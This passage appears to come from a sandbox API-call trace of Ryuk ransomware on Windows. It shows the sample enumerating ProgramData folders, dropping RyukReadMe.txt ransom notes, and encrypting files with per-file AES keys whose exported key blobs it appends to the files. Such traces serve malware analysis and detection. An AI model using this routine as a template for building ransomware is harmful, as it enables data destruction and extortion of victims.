hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0140.607] SetLastError (dwErrCode=0x0) [0140.607] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\event viewer\\views\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.607] GetLastError () returned 0x5 [0140.607] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.607] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.607] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0140.607] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0140.607] SetLastError (dwErrCode=0x0) [0140.607] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Event Viewer\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\event viewer\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.607] GetLastError () returned 0x5 [0140.607] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.607] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.607] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.607] SetLastError (dwErrCode=0x0) [0140.607] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.607] GetLastError () returned 0x5 [0140.607] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.608] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.608] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\IdentityCRL\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0140.608] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.608] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.608] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.608] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0140.608] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0140.608] SetLastError (dwErrCode=0x0) [0140.608] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\IdentityCRL\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\identitycrl\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.608] GetLastError () returned 0x5 [0140.608] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.608] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.608] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.608] SetLastError (dwErrCode=0x0) [0140.608] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.608] GetLastError () returned 0x5 [0140.608] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.608] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.608] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Media Player\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0140.609] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.609] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0140.609] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0140.609] SetLastError (dwErrCode=0x0) [0140.609] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Media Player\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\media player\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.609] GetLastError () returned 0x5 [0140.609] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.609] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.609] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.609] SetLastError (dwErrCode=0x0) [0140.609] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.609] GetLastError () returned 0x5 [0140.609] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.609] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.609] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\MF\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0140.609] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.609] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.609] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.610] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\MF\\Active.GRL", dwFileAttributes=0x80) returned 1 [0140.610] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\MF\\Active.GRL" (normalized: "c:\\programdata\\microsoft\\mf\\active.grl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0140.610] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acfe8 | out: lpFileSize=0x29acfe8*=14972) returned 1 [0140.610] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acff8 | out: lpFileSize=0x29acff8*=14972) returned 1 [0140.610] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x395a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.610] ReadFile (in: hFile=0x188, lpBuffer=0x29ad048, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ad008, lpOverlapped=0x0 | out: lpBuffer=0x29ad048*, lpNumberOfBytesRead=0x29ad008*=0x19, lpOverlapped=0x0) returned 1 [0140.611] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.611] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29acfd0 | out: phKey=0x29acfd0*=0x3b8690) returned 1 [0140.611] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0140.611] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.611] ReadFile (in: hFile=0x188, lpBuffer=0x2760000, nNumberOfBytesToRead=0x3a7c, lpNumberOfBytesRead=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29acfe0*=0x3a7c, lpOverlapped=0x0) returned 1 [0140.612] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4250) returned 1 [0140.612] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x3a7c, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x3a80) returned 1 [0140.612] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.612] WriteFile (in: hFile=0x188, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x3a80, lpNumberOfBytesWritten=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29acfe0*=0x3a80, lpOverlapped=0x0) returned 1 [0140.612] WriteFile (in: hFile=0x188, lpBuffer=0x29ad020*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad020*, lpNumberOfBytesWritten=0x29acfe4*=0x6, lpOverlapped=0x0) returned 1 [0140.612] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29acff0 | out: pbData=0x0*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0140.612] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ad070, pdwDataLen=0x29acff0 | out: pbData=0x29ad070*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0140.613] WriteFile (in: hFile=0x188, lpBuffer=0x29ad070*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad070*, lpNumberOfBytesWritten=0x29acfe4*=0x10c, lpOverlapped=0x0) returned 1 [0140.613] CloseHandle (hObject=0x188) returned 1 [0140.628] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.632] CryptDestroyKey (hKey=0x3b8690) returned 1 [0140.632] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.633] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.633] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.633] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\MF\\Pending.GRL", dwFileAttributes=0x80) returned 1 [0140.640] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\MF\\Pending.GRL" (normalized: "c:\\programdata\\microsoft\\mf\\pending.grl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0140.640] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acfe8 | out: lpFileSize=0x29acfe8*=14972) returned 1 [0140.640] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acff8 | out: lpFileSize=0x29acff8*=14972) returned 1 [0140.640] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x395a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.640] ReadFile (in: hFile=0x188, lpBuffer=0x29ad048, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ad008, lpOverlapped=0x0 | out: lpBuffer=0x29ad048*, lpNumberOfBytesRead=0x29ad008*=0x19, lpOverlapped=0x0) returned 1 [0140.641] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.641] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29acfd0 | out: phKey=0x29acfd0*=0x3b8690) returned 1 [0140.641] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0140.641] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.641] ReadFile (in: hFile=0x188, lpBuffer=0x2760000, nNumberOfBytesToRead=0x3a7c, lpNumberOfBytesRead=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29acfe0*=0x3a7c, lpOverlapped=0x0) returned 1 [0140.642] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4250) returned 1 [0140.642] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x3a7c, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x3a80) returned 1 [0140.642] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.642] WriteFile (in: hFile=0x188, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x3a80, lpNumberOfBytesWritten=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29acfe0*=0x3a80, lpOverlapped=0x0) returned 1 [0140.642] WriteFile (in: hFile=0x188, lpBuffer=0x29ad020*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad020*, lpNumberOfBytesWritten=0x29acfe4*=0x6, lpOverlapped=0x0) returned 1 [0140.642] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29acff0 | out: pbData=0x0*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0140.643] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ad070, pdwDataLen=0x29acff0 | out: pbData=0x29ad070*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0140.643] WriteFile (in: hFile=0x188, lpBuffer=0x29ad070*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad070*, lpNumberOfBytesWritten=0x29acfe4*=0x10c, lpOverlapped=0x0) returned 1 [0140.643] CloseHandle (hObject=0x188) returned 1 [0140.659] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.662] CryptDestroyKey (hKey=0x3b8690) returned 1 [0140.663] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.663] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0140.663] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0140.663] SetLastError (dwErrCode=0x0) [0140.663] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\MF\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\mf\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.663] GetLastError () returned 0x5 [0140.663] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.663] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.663] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.663] SetLastError (dwErrCode=0x0) [0140.663] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.663] GetLastError () returned 0x5 [0140.663] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.663] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.663] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\MSDN\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0140.664] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.664] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.664] SetLastError (dwErrCode=0x0) [0140.664] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\MSDN\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\msdn\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.664] GetLastError () returned 0x5 [0140.664] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.664] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.664] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\MSDN\\8.0\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0140.664] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.664] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0140.664] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0140.664] SetLastError (dwErrCode=0x0) [0140.664] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\MSDN\\8.0\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\msdn\\8.0\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.664] GetLastError () returned 0x5 [0140.664] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.664] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.665] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0140.665] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0140.665] SetLastError (dwErrCode=0x0) [0140.665] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\MSDN\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\msdn\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.665] GetLastError () returned 0x5 [0140.665] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.665] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.665] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.665] SetLastError (dwErrCode=0x0) [0140.665] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.665] GetLastError () returned 0x5 [0140.665] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.665] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.665] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\NetFramework\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0140.665] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.665] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.665] SetLastError (dwErrCode=0x0) [0140.665] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\NetFramework\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\netframework\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.665] GetLastError () returned 0x5 [0140.665] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.665] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.666] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0xffffffffffffffff [0140.666] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0140.666] SetLastError (dwErrCode=0x0) [0140.666] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\netframework\\breadcrumbstore\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0140.667] GetLastError () returned 0x0 [0140.667] WriteFile (in: hFile=0x188, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ad1f0*=0x320, lpOverlapped=0x0) returned 1 [0140.667] CloseHandle (hObject=0x188) returned 1 [0140.667] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0140.667] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0140.668] SetLastError (dwErrCode=0x0) [0140.668] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\NetFramework\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\netframework\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.668] GetLastError () returned 0x5 [0140.668] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.668] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.668] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.668] SetLastError (dwErrCode=0x0) [0140.668] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.668] GetLastError () returned 0x5 [0140.668] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.668] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.668] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Network\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0140.668] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.668] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.668] SetLastError (dwErrCode=0x0) [0140.668] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Network\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\network\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.668] GetLastError () returned 0x5 [0140.668] WriteFile (in: hFile=0xffffffffffffffff, 